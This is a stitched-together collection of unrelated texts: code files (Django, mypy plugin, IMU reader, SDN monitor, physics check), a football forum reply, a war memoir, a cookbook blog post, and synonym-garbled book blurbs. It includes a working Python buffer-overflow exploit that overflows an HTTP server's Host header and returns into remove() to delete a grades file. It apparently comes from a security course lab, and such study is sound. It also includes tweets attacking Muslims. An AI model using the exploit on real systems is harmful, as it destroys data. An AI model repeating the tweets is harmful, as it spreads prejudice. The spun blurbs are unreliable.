Using the players you mentioned I think Calvin Ridley would be a great fit. Alabama used him on a lot of quick tunnel screens and bubble screens as well as the deep routes that Nagy likes to use (think sluggos and out-and-ups). He’s also versatile in the sense that he can line up in the slot or as a boundary receiver. I don’t think Landry is as much of a fit just because yards after catch isn’t necessarily his thing or his greatest attribute plus the price tag will be a big one. Even going back to college tape Mitch was never one to throw jump balls to his wide receivers so I don’t think of Sutton as a great fit either. One name I think will be mentioned a lot is Paul Richardson of the Seattle Seahawks. He’s really quick, can get separation, and I could see him thriving in this offense. He’s also a pretty great deep threat as well which would be nice for Nagy and our new offensive coordinator Mark Helfrich.
|
from django.db import models
from .Resource import *
class PublicationManager(models.Manager):
    """Manager providing CRUD helpers for Publication resources."""

    def addPublication(self, request):
        """ add new publication """
        R = Resource.objects.addResource(request)
        P = Publication(
            resource=R,
            title=request['title'],
            authors=request['authors'],
            publicationDate=request['publicationDate'],
            organization=request['organization'],
            link=request['link']
        )
        P.save()
        return P

    def editPublication(self, request):
        """ edit existing publication """
        R = Resource.objects.editResource(request)
        P = Publication.objects.get(resource=R)
        P.title = request['title']
        P.authors = request['authors']
        P.publicationDate = request['publicationDate']
        P.organization = request['organization']
        P.link = request['link']
        P.save()
        return P

    def getDocumentById(self, request):
        """ get publication details on the basis of resource ID """
        R = Resource.objects.getResourceById(request)
        P = Publication.objects.get(resource=R)
        return P

    def retrievePublications(self, request):
        """ retrieve details of all the publications depending on the request

        note: courseId is compulsory field; title, authors, organization,
        link are optional fields
        """
        R = Resource.objects.retrieveResources(request)
        P = Publication.objects.filter(pk__in=R)
        # BUG FIX: P is a QuerySet here, not a model class. Chaining must use
        # P.filter(...); the previous P.objects.filter(...) raised
        # AttributeError because QuerySets have no `objects` attribute.
        if 'title' in request:
            P = P.filter(title=request['title'])
        if 'authors' in request:
            P = P.filter(authors=request['authors'])
        if 'organization' in request:
            P = P.filter(organization=request['organization'])
        if 'link' in request:
            P = P.filter(link=request['link'])
        return P

    def deletePublication(self, request):
        """ deletes existing publication (and its underlying resource) """
        R = Resource.objects.getResourceById(request)
        P = Publication.objects.get(resource=R)
        P.delete()
        R.delete()
        return P
class Publication(models.Model):
    """A publication (paper/article) attached to a Resource record."""

    # Resource (primary key; deleting the Resource cascades to this row)
    resource = models.OneToOneField(Resource, on_delete=models.CASCADE, primary_key=True)
    # Title
    title = models.CharField(max_length=500, blank=False, null=False)
    # Authors
    authors = models.CharField(max_length=250)
    # Publication date
    publicationDate = models.DateField(editable=True, auto_now=False, auto_now_add=False)
    # Organization
    organization = models.CharField(max_length=100)
    # Link
    link = models.URLField()

    objects = PublicationManager()

    def __str__(self):
        # BUG FIX: publicationDate is a datetime.date and cannot be
        # concatenated with str directly (TypeError); convert it explicitly.
        return self.title + " - " + self.authors + " - " + str(self.publicationDate)
|
This resource has 15 worksheets of fraction word problems. That's 120 word problems with answer sheets.
You may also be interested in Decimal Word Problems and Rates and Ratios Word Problems!
|
'''Check if the new sphere mobility is positive definite for all distance'''
import numpy as np
import sys
import sphere as sph
sys.path.append('..')
from fluids import mobility as mb
from quaternion_integrator.quaternion import Quaternion
# Sweep the sphere height from 2*A down to about 0.9*A and, at each
# distance, print scaled mobility components and verify the mobility
# matrix is positive definite via a Cholesky factorisation (which raises
# numpy.linalg.LinAlgError if it is not).
if __name__ == '__main__':
    # Parameters
    points = 1000  # number of sampled distances
    distance = sph.A * 2  # starting height: two sphere radii
    orientation = Quaternion([1., 0., 0., 0.])  # identity orientation
    location = [ [0., 0., distance] ]
    # Step size chosen so the sweep ends near 0.9 * A.
    dd = (distance - sph.A * 0.9) / float(points)
    # Pre-increment so the first in-loop decrement lands exactly on 2*A.
    distance = distance + dd
    # Loop for distances
    if(1):
        for i in range(points):
            distance -= dd
            #print i, distance
            location = [ [0., 0., distance] ]
            mobility = sph.sphere_mobility(location, orientation)
            # Output columns: h/A, translational xx and zz components
            # (scaled by 6*pi*eta*A), rotational xx and zz components
            # (scaled by 8*pi*eta*A^3), and the translation-rotation
            # coupling term (scaled by 6*pi*eta*A^2).
            data = str(distance/sph.A) + ' '
            data += str(mobility[0, 0] * (6.0*np.pi*sph.ETA * sph.A)) + ' '
            data += str(mobility[2, 2] * (6.0*np.pi*sph.ETA * sph.A)) + ' '
            data += str(mobility[3, 3] * (8.0*np.pi*sph.ETA * sph.A**3)) + ' '
            data += str(mobility[5, 5] * (8.0*np.pi*sph.ETA * sph.A**3)) + ' '
            data += str(mobility[0, 4] * (6.0*np.pi*sph.ETA * sph.A**2))
            print data
            # This is the actual positive-definiteness check: cholesky
            # raises if the mobility matrix is not positive definite.
            mobility_half = np.linalg.cholesky(mobility)
    print "#END"
|
It is enormously paradoxical that John Milton — who opposed infant baptism, supported regicide, defended divorce and approved of polygamy — can be heard as a voice of orthodoxy. Yet recent scholarship has usually understated or defined away his heretical critiques. This volume investigates aspects of Milton's works inconsistent with traditional beliefs, whether in relation to seventeenth-century theology or the common assumptions of Milton scholars. Contributors situate Milton and his writings within his particular historical circumstances, paying special attention to Milton's pragmatic position within seventeenth-century religious controversy. The volume's four sections deal with heretical theology, heresy's consequences, heresy and community, and readers of heresy; their shared premise is that Milton, as poet, philosopher and public servant, eschewed fixed beliefs and regarded indeterminacy and uncertainty as fundamental to human existence.
The literary 'middle ground', as soon as brushed off by way of academia as insignificant, is the location of strong anxieties approximately cultural authority that proceed to this present day. briefly, the middlebrow concerns . those essays learn the prejudices and aspirations at paintings within the 'battle of the brows', and convey that cultural worth is often relative and situational.
Interpreting a wealthy new new release of Latin American writers, this assortment deals new views at the present prestige of Latin American literature within the age of globalization. Authors explored are from the increase and Postboom sessions, together with those that mix social preoccupations, like drug trafficking, with aesthetic ones.
The sport of chess was once wildly well known within the center a while, lots in order that it turned a major inspiration paradigm for thinkers and writers who applied its vocabulary and imagery for commentaries on struggle, politics, love, and the social order. during this number of essays, students examine chess texts from a variety of traditions – English, French, German, Latin, Persian, Spanish, Swedish, and Catalan – and argue that wisdom of chess is key to knowing medieval tradition.
Whereas Kierkegaard might be identified most sensible as a non secular philosopher and thinker, there's an unmistakable literary aspect in his writings. He usually explains advanced ideas and concepts through the use of literary figures and motifs that he may possibly imagine his readers might have a few familiarity with. This measurement of his concept has served to make his writings way more renowned than these of alternative philosophers and theologians, yet whilst it has made their interpretation extra complicated.
|
#!/usr/bin/python
import sys
import serial
from serial.tools import list_ports
from mpudata import quat_packet, debug_packet, data_packet
import os
import time
import numpy as np
import matplotlib.pyplot as plt
import euclid
class mpu9150interface(object):
    """Serial interface to an MPU-9150 IMU.

    Reads fixed-size packets ('$' marker, packet-code byte, 23 bytes total)
    from a serial port, collects quaternion and accelerometer samples into
    fixed-size buffers, and rotates the accelerometer vectors into the
    world frame using the received quaternions.
    """
    def __init__(self):
        # Allocate fixed-size sample buffers; no I/O happens here.
        #self.connect()
        #self.read()
        print "init"
        self.SIZE = 100
        # Per-axis accelerometer samples.
        self.x_list = [None]*self.SIZE
        self.y_list = [None]*self.SIZE
        self.z_list = [None]*self.SIZE
        # Gravity-compensated magnitude per sample.
        self.mag_list = [None]*self.SIZE
        # Raw quaternion and accelerometer packets.
        self.quat_list = [None]*self.SIZE
        self.accel_list = [None]*self.SIZE
        # Accelerometer vectors rotated into the world frame (see read()).
        self.calibrated_list = [None] * self.SIZE
        self.port="null"
        self.gravity = np.array([0,0,0])
    def connect(self):
        """Interactively pick a serial port and open it at 115200 baud."""
        ports = list(self.serial_ports())
        for idx,val in enumerate(ports):
            print str(idx) + ". "+val
        num = raw_input("Select the port for the MPU-9150 : ")
        self.port = ports[int(num)]
        self.s = serial.Serial(self.port , 115200 , timeout=1)
        #self.ser.open()
        if self.s.isOpen():
            print "Connected..."
        else:
            self.s.open()
    def send(self, str):
        # Write one character at a time with a delay between characters.
        # NOTE(review): the parameter name shadows the builtin `str`;
        # harmless here but worth renaming if this is ever touched.
        for i in range(0,len(str)):
            self.s.write(str[i])
            time.sleep(0.1)
    def write(self):
        """Interactive command loop: forward typed commands until 'q'."""
        command = ""
        while command != "q":
            command = raw_input("To Mpu>")
            self.send(command)
    def serial_ports(self):
        """
        Returns a generator for all available serial ports
        """
        if os.name == 'nt':
            # windows: probe COM1..COM256 by trying to open each one
            for i in range(256):
                try:
                    s = serial.Serial(i)
                    s.close()
                    yield 'COM' + str(i + 1)
                except serial.SerialException:
                    pass
        else:
            # unix
            for port in list_ports.comports():
                yield port[0]
    def zeroing(self):
        """Sample the resting accelerometer reading as the gravity vector.

        NOTE(review): `self.index` is never incremented here, and the
        increment inside read_debug is commented out, so this loop can spin
        forever. read_debug also reads self.index_accel, which is only
        initialised by read() -- calling zeroing() first would raise
        AttributeError. Confirm intended call order before relying on this.
        """
        self.index=0
        while (self.index <2 ):
            self.read_debug()
            #print self.index,
        self.gravity = np.array([ self.data[0],self.data[1] ,self.data[2] ])
        print self.gravity
    def read_debug(self):
        """Drain complete 23-byte packets from the serial buffer.

        Packets start with '$' followed by a code byte: 1 = debug packet,
        2 = quaternion packet, 3 = data packet (type 0 = accelerometer).
        Accelerometer samples are stored per axis and as a
        gravity-compensated magnitude; stops once the buffers are full.
        """
        NUM_BYTES = 23
        p = None
        time.sleep(0.01)
        while self.s.inWaiting() >= NUM_BYTES:
            if self.index_accel >= self.SIZE:
                # Buffers full; leave remaining bytes for the next call.
                break
            rs = self.s.read(NUM_BYTES)
            if ord(rs[0]) == ord('$'):
                pkt_code = ord(rs[1])
                #print "."
                #print "\r"+str(pkt_code),
                if pkt_code == 1:
                    d = debug_packet(rs)
                    d.display()
                elif pkt_code == 2:
                    p = quat_packet(rs)
                    self.quat_list[self.index_quat] = p
                    self.index_quat = self.index_quat + 1
                    #p.display()
                    print "+"
                elif pkt_code == 3:
                    d = data_packet(rs)
                    #d.display()
                    self.data = d.data
                    datatype = d.type
                    if datatype ==0:
                        #self.index = self.index+1
                        #print self.index
                        self.accel_list[self.index_accel] = d
                        self.x_list[self.index_accel] = d.data[0]
                        self.y_list[self.index_accel] = d.data[1]
                        self.z_list[self.index_accel] = d.data[2]
                        # Subtract the gravity estimate, then store the
                        # magnitude offset from 1 g.
                        vec = [d.data[0] , d.data[1], d.data[2]]
                        vec = vec - self.gravity
                        norm = np.linalg.norm(vec)
                        norm = norm-1
                        self.mag_list[self.index_accel] = norm
                        self.index_accel = self.index_accel +1
                        print "-",
        sys.stdout.flush()
    def read(self):
        """Log samples until the buffers fill, then rotate accel vectors.

        After logging, each accelerometer vector is rotated by the
        conjugate of the paired quaternion and stored in calibrated_list.
        """
        self.index_quat = 0
        self.index_accel = 0
        print "logging..."
        n=0
        while( self.index_accel < (self.SIZE-1)):
            self.read_debug()
            print self.index_accel,
            sys.stdout.flush()
        self.s.close()
        print "plotting..."
        #plt.plot(self.mag_list)
        #plt.show()
        for i in range(0,self.SIZE):
            #print i
            q = self.quat_list[i]
            d = self.accel_list[i]
            # Quaternion and accel packets arrive independently, so either
            # slot can be empty; only process complete pairs.
            if (q is not None) and (d is not None):
                #if not isinstance(q,None) and not isinstance(d,None)
                #print d
                v = euclid.Vector3(d.data[0], d.data[1], d.data[2])
                quat = q.to_q().conjugated()
                #print quat
                #print v
                ###########
                q = quat*v
                self.calibrated_list[i] = q
if __name__ =="__main__":
    # Usage:
    #   script.py setup   -- interactively pick a port and send commands
    #   script.py <port>  -- open the named port directly and log samples
    mpu =mpu9150interface()
    if (len(sys.argv) == 2):
        if sys.argv[1] == "setup":
            mpu.connect()
            mpu.write()
            mpu.s.close()
        else:
            mpu.s = serial.Serial(sys.argv[1],115200, timeout =1)
            print mpu.s
    # NOTE(review): if the script is run with no arguments, mpu.s was never
    # assigned and this isOpen() call raises AttributeError -- confirm the
    # intended no-argument behaviour.
    if(mpu.s.isOpen()):
        print "connected..."
    #mpu.s = serial.Serial("/dev/cu.usbmodemfa141",115200, timeout =1)
    #mpu.read()
    #raw_input("press enter to zeroing...")
    #mpu.zeroing()
    raw_input("press enter to start...")
    mpu.read()
|
I am an old man now, however I was born in Hong kong where I lived until I was nine years of age. My Parents worked in the Colony pre war and post war. My mother and elder brother escaped to Australia before the Japs invaded. My father was in the HKVDC. He never spoke much about what went on except to tell me little bits about the surrender. They fought like tigers with units of the Punjab Rifles. They fell back from Kowloon, the C/O of the Punjabies pulled rank on dad and told him to take his men over to Victoris Island as people would know it,which he did. Jap Destroyers sailed round and round, shelling them day & night. Water was very short towards the end and he told me they drank from toilets and cisterns,not destroyed. The Japs finally landed and the fighting became hand to hand. From what I can gather, they were a pretty rough, “raggle taggle” group of all sorts of other regiments. Anyway,the Japs pushed them towards the top of the Peak and the situation became hopeless. The Govenor who’s name I shamefully admit escapes me said at a meeting. To continue would be a waste of life so, we must surrender! Which of course they did.
We now know that to a Jap, if you surrender, you are lower than a dog!!! That’s when the beating’s began. Dad was alway’s very proud of the Chinese men in his platoon, as a civillian he was a Health Inspector and his men were the koolies in his department. Their courage was outstanding he said and was always ashamed at their lack of recognition after the war. While in Sham Shei Po Camp ( forgive spelling), this is one of the thing’s he saw. I’ll tell it to you as he told it to me.
A young Chinese girl in a Bath chair ( wheel chair) was throwing penney Buns (small bread rolls) over the wire to the prisoners. An order was given and she was dragged out of her chair and into the camp. There she was humiliated, kicked and beaten & finally butchered, in front of the men. I believe some who verbally protested were shot! He and others were taken to Sendai in Japan and made to work as coal miners, slaves to the Emperor of Japan. A lot of the chaps he was sent with were Canadians. He survived the war and returned to HK and worked in the health department until he retired in 1957 when we came back to the UK. After the war, my brother, 18 years older than me and his friend Bobby Stott, found two bodies of Canadian soldiers in a pill box in what I can only imagine were ” The New Territories”. They reported the find of course. As a small boy, I can recall dad takeing me to a holding place of some sort. It was full of Japanese vehicles, Tanks and so on, which he allowed me to stand on. From my friends apartment at a place called King’s Park, I could see out over a bay where there were two Jap Destroyers which had been sunk. I very much doubt if there is much left of my Hong Kong. I went to the Kowloon Junior school and my friend was a South African callled Van der Lin, his dad was a doctor and they lived in a beautiful bungalow on top of a hill, I cannot remember where though? An American airman used to visit his parents every single year. The japs shot him and his companion down, both bailed out. One of them saw some young Chinese girls who had been stripped naked and made to stand in front of a white wall, holding a concrete block over their heads, in the heat of the sun. The Americans bombed them so I was told. To drop the block meant being bayoneted !!! One airman was caught, tied behind a truck and dragged to his death through the streets? The other broke his leg on landing in the jungle. 
Doctor Van der Lin found him, hid him and more to the point, treated his leg.That’s why he visited every year. I believe they lived among the Chinese in a fishing village during the occupation. I’m sure there are many stories like this which have gone untold. I returned to Hong Kong in 1966/67 in the Royal Navy. I am disabled now so a long flight is out of the question, however, my mind often takes me back to my beloved Hueng Ha! Again please forgive spelling, but you know what I mean.
|
from collections import OrderedDict
from typing import List, Optional, Sequence, Type
from django.core.exceptions import FieldError
from django.db.models.base import Model
from django.db.models.fields.related import RelatedField
from django.db.models.fields.reverse_related import ForeignObjectRel
from mypy.nodes import Expression, NameExpr
from mypy.plugin import FunctionContext, MethodContext
from mypy.types import AnyType, Instance
from mypy.types import Type as MypyType
from mypy.types import TypeOfAny
from mypy_django_plugin.django.context import (
DjangoContext, LookupsAreUnsupported,
)
from mypy_django_plugin.lib import fullnames, helpers
def _extract_model_type_from_queryset(queryset_type: Instance) -> Optional[Instance]:
    """Return the model Instance a queryset type is parametrized over, if any.

    Checks the queryset type itself first, then each of its bases, for a
    first type argument that is a Django Model subclass.
    """
    candidates = [queryset_type] + list(queryset_type.type.bases)
    for candidate in candidates:
        if not candidate.args:
            continue
        first_arg = candidate.args[0]
        if isinstance(first_arg, Instance) and first_arg.type.has_base(fullnames.MODEL_CLASS_FULLNAME):
            return first_arg
    return None
def determine_proper_manager_type(ctx: FunctionContext) -> MypyType:
    """Specialize a manager's return type with the enclosing model class.

    If we are not inside a Django model class body, the default return
    type is kept unchanged.
    """
    ret_type = ctx.default_return_type
    assert isinstance(ret_type, Instance)

    active_class = helpers.get_typechecker_api(ctx).scope.active_class()
    if active_class is not None and active_class.has_base(fullnames.MODEL_CLASS_FULLNAME):
        return helpers.reparametrize_instance(ret_type, [Instance(active_class, [])])
    return ret_type
def get_field_type_from_lookup(ctx: MethodContext, django_context: DjangoContext, model_cls: Type[Model],
                               *, method: str, lookup: str) -> Optional[MypyType]:
    """Resolve `lookup` on `model_cls` and return the type `method` yields for it.

    Returns None (after reporting a mypy error) for invalid lookups, and
    Any when the lookup uses features the plugin does not support.
    """
    try:
        lookup_field = django_context.resolve_lookup_into_field(model_cls, lookup)
    except LookupsAreUnsupported:
        return AnyType(TypeOfAny.explicit)
    except FieldError as exc:
        ctx.api.fail(exc.args[0], ctx.context)
        return None

    # A lookup that lands on a relation (directly by column, or a reverse
    # relation) resolves to the related model's primary key field.
    lands_on_relation = (
        (isinstance(lookup_field, RelatedField) and lookup_field.column == lookup)
        or isinstance(lookup_field, ForeignObjectRel))
    if lands_on_relation:
        related_model_cls = django_context.get_field_related_model_cls(lookup_field)
        if related_model_cls is None:
            return AnyType(TypeOfAny.from_error)
        lookup_field = django_context.get_primary_key_field(related_model_cls)

    return django_context.get_field_get_type(helpers.get_typechecker_api(ctx),
                                             lookup_field, method=method)
def get_values_list_row_type(ctx: MethodContext, django_context: DjangoContext, model_cls: Type[Model],
                             flat: bool, named: bool) -> MypyType:
    """Compute the row type produced by .values_list(*fields, flat=..., named=...).

    flat=True yields the bare column type, named=True yields a one-off
    NamedTuple, otherwise a plain tuple of the column types.
    """
    field_lookups = resolve_field_lookups(ctx.args[0], django_context)
    if field_lookups is None:
        # At least one lookup argument could not be resolved to a string literal.
        return AnyType(TypeOfAny.from_error)
    typechecker_api = helpers.get_typechecker_api(ctx)
    if len(field_lookups) == 0:
        if flat:
            # values_list(flat=True) with no fields returns primary-key values.
            primary_key_field = django_context.get_primary_key_field(model_cls)
            lookup_type = get_field_type_from_lookup(ctx, django_context, model_cls,
                                                     lookup=primary_key_field.attname, method='values_list')
            # The pk attname is always a valid lookup, so this cannot fail.
            assert lookup_type is not None
            return lookup_type
        elif named:
            # values_list(named=True) with no fields: NamedTuple over all model fields.
            column_types: 'OrderedDict[str, MypyType]' = OrderedDict()
            for field in django_context.get_model_fields(model_cls):
                column_type = django_context.get_field_get_type(typechecker_api, field,
                                                                method='values_list')
                column_types[field.attname] = column_type
            return helpers.make_oneoff_named_tuple(typechecker_api, 'Row', column_types)
        else:
            # flat=False, named=False, all fields
            field_lookups = []
            for field in django_context.get_model_fields(model_cls):
                field_lookups.append(field.attname)
    if len(field_lookups) > 1 and flat:
        typechecker_api.fail("'flat' is not valid when 'values_list' is called with more than one field", ctx.context)
        return AnyType(TypeOfAny.from_error)
    # Resolve each requested lookup to its column type, preserving order.
    column_types = OrderedDict()
    for field_lookup in field_lookups:
        lookup_field_type = get_field_type_from_lookup(ctx, django_context, model_cls,
                                                       lookup=field_lookup, method='values_list')
        if lookup_field_type is None:
            return AnyType(TypeOfAny.from_error)
        column_types[field_lookup] = lookup_field_type
    if flat:
        # Enforced above: flat is only valid with exactly one column.
        assert len(column_types) == 1
        row_type = next(iter(column_types.values()))
    elif named:
        row_type = helpers.make_oneoff_named_tuple(typechecker_api, 'Row', column_types)
    else:
        row_type = helpers.make_tuple(typechecker_api, list(column_types.values()))
    return row_type
def extract_proper_type_queryset_values_list(ctx: MethodContext, django_context: DjangoContext) -> MypyType:
    """Infer QuerySet[Model, Row] for a .values_list(...) call."""
    # Called on the Instance, returns QuerySet of something.
    assert isinstance(ctx.type, Instance)
    assert isinstance(ctx.default_return_type, Instance)

    model_type = _extract_model_type_from_queryset(ctx.type)
    if model_type is None:
        return AnyType(TypeOfAny.from_omitted_generics)

    model_cls = django_context.get_model_class_by_fullname(model_type.type.fullname)
    if model_cls is None:
        return ctx.default_return_type

    def _bool_arg(name: str) -> Optional[bool]:
        # Only literal name expressions (True/False) can be evaluated statically.
        expr = helpers.get_call_argument_by_name(ctx, name)
        if expr is not None and isinstance(expr, NameExpr):
            return helpers.parse_bool(expr)
        return False

    flat = _bool_arg('flat')
    named = _bool_arg('named')

    if flat and named:
        ctx.api.fail("'flat' and 'named' can't be used together", ctx.context)
        return helpers.reparametrize_instance(ctx.default_return_type,
                                              [model_type, AnyType(TypeOfAny.from_error)])

    # parse_bool may yield None; normalize before delegating.
    row_type = get_values_list_row_type(ctx, django_context, model_cls,
                                        flat=bool(flat), named=bool(named))
    return helpers.reparametrize_instance(ctx.default_return_type, [model_type, row_type])
def resolve_field_lookups(lookup_exprs: Sequence[Expression], django_context: DjangoContext) -> Optional[List[str]]:
    """Resolve each lookup expression to its string value.

    Returns None as soon as any expression cannot be resolved statically.
    """
    resolved: List[str] = []
    for expr in lookup_exprs:
        value = helpers.resolve_string_attribute_value(expr, django_context)
        if value is None:
            return None
        resolved.append(value)
    return resolved
def extract_proper_type_queryset_values(ctx: MethodContext, django_context: DjangoContext) -> MypyType:
    """Infer QuerySet[Model, TypedDict-row] for a .values(...) call."""
    # Called on QuerySet, return QuerySet of something.
    assert isinstance(ctx.type, Instance)
    assert isinstance(ctx.default_return_type, Instance)

    model_type = _extract_model_type_from_queryset(ctx.type)
    if model_type is None:
        return AnyType(TypeOfAny.from_omitted_generics)

    model_cls = django_context.get_model_class_by_fullname(model_type.type.fullname)
    if model_cls is None:
        return ctx.default_return_type

    field_lookups = resolve_field_lookups(ctx.args[0], django_context)
    if field_lookups is None:
        return AnyType(TypeOfAny.from_error)

    # No explicit fields means "every concrete field of the model".
    if not field_lookups:
        field_lookups = [field.attname for field in django_context.get_model_fields(model_cls)]

    column_types: 'OrderedDict[str, MypyType]' = OrderedDict()
    for lookup in field_lookups:
        lookup_type = get_field_type_from_lookup(ctx, django_context, model_cls,
                                                 lookup=lookup, method='values')
        if lookup_type is None:
            return helpers.reparametrize_instance(ctx.default_return_type,
                                                  [model_type, AnyType(TypeOfAny.from_error)])
        column_types[lookup] = lookup_type

    row_type = helpers.make_typeddict(ctx.api, column_types, set(column_types.keys()))
    return helpers.reparametrize_instance(ctx.default_return_type, [model_type, row_type])
|
Even better, she was really nice- way nicer than I probably would have been after signing at least 300 books (by the time I was able to meet her) and knowing there were probably around another 200 to go. I can't imagine how wonderful a manicure/hand massage would feel after holding a pen for that long!
I brought her a gift of my stationery to say thank you for everything she has done and as a welcome gift for coming to Atlanta. I really hope she enjoys and likes my work. Martha has been such an inspiration for so many and I hope she realizes the impact she makes in so many people's lives. For me, knowing Martha was able to become who she is today not only inspired me, but also gave me the courage to develop my own stationery line. And seeing how many other people took over 3 hours out of their day just to meet her shows that I'm not alone in how I feel!
As for her cookbook, it is amazing! I was sitting admiring it all last night pointing out pictures and recipes as J. tried to watch a movie. Unlike most cookie cookbooks that are just a collection of recipes thrown together, this one was organized by the texture of the cookie- i.e. chewy, crunchy, etc. What a cool way to set up a cookbook! Also, each recipe is accompanied by a large full color glossy photo. Maybe it's just the artist in me, but I really dislike cookbooks that only include a few pictures.
"Wow, that carbonara I'm not making looks amazing, but is this really how my tortellini is supposed to look?" is a question you should never have to ask when using a cookbook.
Back to the cookies. They all look wonderful and I can't wait to try each one. You really should go out and buy the book. Like right now. And if you are "just going to buy one for a friend", order two. Once you see it for yourself, you won't want to give it up. Only problem is- the book has shown me I need more "tools of the trade". Now I'm not talking about the cute cookie molds (though I wouldn't turn them down if someone happened to pick up some for me!), but more of the basic cookie making tools.
Prime example- rolling pin, like this super cute pink one.
I have held out for a while now- using other objects that do a semi-decent job, but last night as I watched J try to flatten our pizza dough, I caved. We really need a rolling pin.
So thank you Martha. Not only for inspiring us, and coming to Atlanta to give us all the opportunity to meet you, but also for finally showing me just why I really have to have a rolling pin!
*sidenote- I wish she would tell everyone what she uses/ has been doing to keep herself looking so ageless- the woman looked amazing. Refreshed, relaxed, and completely wrinkle free!
|
#!/usr/bin/python
import sys
import socket
import traceback
import urllib
import struct
# stack values
# Absolute addresses in the vulnerable server's stack frame (32-bit layout).
# NOTE(review): names suggest their roles; confirm against the target binary.
fd_addr = 0xbfffde10      # presumably the socket fd local
return_addr = 0xbfffde0c  # saved return address slot
ebp_addr = 0xbfffde08     # saved frame pointer slot
i_addr = 0xbfffddfc       # presumably a loop counter local
value_addr = 0xbfffdbf4   # start of the overflowed buffer
envvar_addr = 0xbfffd9f4  # presumably an environment-variable buffer
# attack values
func_addr = 0x4007b170    # address called in place of the real return (remove(), per build_exploit)
ptr_to_file_addr = fd_addr + 0x8  # where file_str will land on the stack
file_str = "/home/httpd/grades.txt\n"  # newline-terminated path passed to remove()
ret_addr = 0x4007b170     # fake return address (same function again)
def build_exploit(shellcode):
    """Build the HTTP request that overflows the Host-header buffer.

    The payload overwrites the saved EBP/return address so the server
    "returns" into remove() with a pointer to the grades file path.

    Note: `shellcode` is accepted but unused -- this is a return-to-libc
    style attack, not shellcode injection.

    NOTE(review): struct.pack returns bytes on Python 3, so the str
    concatenation below only works on Python 2 -- confirm target runtime.
    """
    req = "GET / HTTP/1.0\r\n" + "Host: " # GET request header
    req += "a" * (ebp_addr - value_addr + 4) # padding up to saved EBP + 4
    req += struct.pack("<I",func_addr) # remove()
    req += struct.pack("<I",ret_addr) # fake return address (also remove())
    req += struct.pack("<I",ptr_to_file_addr) # pointer to "grades.txt"
    req += file_str # "grades.txt"
    req += "\r\n\r\n" # GET request suffix
    return req
def send_req(host, port, req):
    """Open a TCP connection to host:port, send `req`, and return the
    entire response read until the peer closes the connection."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("Connecting to %s:%d..." % (host, port))
    sock.connect((host, port))
    print("Connected, sending request...")
    sock.send(req)
    print("Request sent, waiting for reply...")
    # Accumulate 1 KiB chunks until recv() signals EOF with an empty read.
    chunks = []
    chunk = sock.recv(1024)
    while len(chunk):
        chunks.append(chunk)
        chunk = sock.recv(1024)
    print("Received reply.")
    sock.close()
    return "".join(chunks)
# execute request
if len(sys.argv) != 3:
    print("Usage: " + sys.argv[0] + " host port")
    exit()
try:
    # Use a context manager so the file is closed even if reading fails
    # (the original leaked the handle on any exception).
    # NOTE(review): shellcode is binary data; text mode "r" is kept only to
    # preserve the original behavior -- confirm whether "rb" is intended.
    with open("shellcode.bin", "r") as shellfile:
        shellcode = shellfile.read()
    req = build_exploit(shellcode)
    print("HTTP request:")
    print(req)
    resp = send_req(sys.argv[1], int(sys.argv[2]), req)
    print("HTTP response:")
    print(resp)
except Exception:
    # Narrowed from a bare `except:`, which would also swallow
    # SystemExit and KeyboardInterrupt.
    print("Exception:")
    print(traceback.format_exc())
|
We looked inside some of the tweets by @Lexa_Merica and here's what we found interesting.
YOU HAVE GOT TO BE KIDDING ME! These chicks are pushing their luck and riding this current idiocracy of #Muslims being allowed to do whatever the hell they want in our #USA We don't get a #Christians Women's day, so no #muslimwomensday 👇Retweet if you agree this is repulsive.
. JESUS is LOVE LOVE is JESUS LOVE is hanging there saying I have Died for you LOVE is giving Life so you can make it through LOVE is Loving more so you can Win your War LOVE is what your Heart has been Longing For .
No Sh!t ! Of course he said that...it gave credibility to the Special Counsel and implied there would be NO political bias for President. Our President isn’t a dummy...if you haven’t figured it out by now he is VERY intelligent!
|
"""Project For Port Monitor on switches."""
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.topology.api import get_switch
from ryu.controller.handler import set_ev_cls
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.lib import hub
from setting.db.data_collection import switch_stat
from setting.routing.utils.calculate_route import check_switch_load
from routing_adjustment import Routing_UpdateEvent
from setting.variable import constant
import logging
import time
import datetime
class PortStatMonitor(app_manager.RyuApp):
    # Events this app may raise to its observers (routing adjustment requests).
    _EVENTS = [Routing_UpdateEvent]
    """Class for Port Monitor."""  # NOTE(review): misplaced -- follows an assignment, so not the real class docstring.
    def __init__(self, *args, **kwargs):
        """Initialize the app, start the polling thread and attach a file log handler."""
        super(PortStatMonitor, self).__init__(*args, **kwargs)
        # get_switch() needs a running app reference; this app serves as its own.
        self.topology_api_app = self
        # Green thread driving the 1-second polling loop for the app's lifetime.
        self.monitor_thread = hub.spawn(self._monitor)
        hdlr = logging.FileHandler('sdn_log.log')
        self.logger.addHandler(hdlr)
    def _monitor(self):
        """Poll every known switch once per second; raise Routing_UpdateEvent
        when check_switch_load reports overloaded switches."""
        while True:
            switch_list = get_switch(self.topology_api_app, None)
            switch_id_list = []
            for datapath in switch_list:
                # Refresh alive-port bookkeeping, then request fresh counters.
                self._update_sw_stas(datapath)
                self._request_stats(datapath.dp)
                switch_id_list.append(datapath.dp.id)
            # Overloaded switches according to the shared statistics store.
            target_list = check_switch_load(switch_id_list, switch_stat,
                                            constant.load_limitation)
            print'target_list', target_list, len(target_list)
            if len(target_list) > 0:
                ev = Routing_UpdateEvent(target_list, constant.load_limitation)
                # print 'evevevevevev', ev, ev.msg
                self.send_event_to_observers(ev)
            hub.sleep(1)
    def _update_sw_stas(self, datapath):
        """Update statistics for switches method.

        Maintains the per-switch 'alive_port' list and clears stats
        entries for ports that have gone down.
        """
        # Initialization
        if switch_stat.get(datapath.dp.id) is None:
            alive_ports = []
            switch_stat.update({datapath.dp.id: {'alive_port': alive_ports}})
        # Update active ports in list
        alive_port_list = switch_stat.get(datapath.dp.id).get('alive_port')
        for port in datapath.ports:
            if port.is_live():
                if port.port_no not in alive_port_list:
                    alive_port_list.append(port.port_no)
            else:
                if port.port_no in alive_port_list:
                    alive_port_list.remove(port.port_no)
                # NOTE(review): 'stats' is only created in the stats-reply
                # handler; if a port dies before any reply arrives, .get('stats')
                # is None here and this raises AttributeError -- confirm.
                if switch_stat.get(datapath.dp.id).get('stats').get(port.port_no) is not None:
                    p_stat = switch_stat.get(datapath.dp.id).get('stats')
                    p_stat[port.port_no] = None
    def _request_stats(self, datapath):
        """Send PortStatsRequest method.

        Asks the switch for counters on all ports (OFPP_ANY).
        """
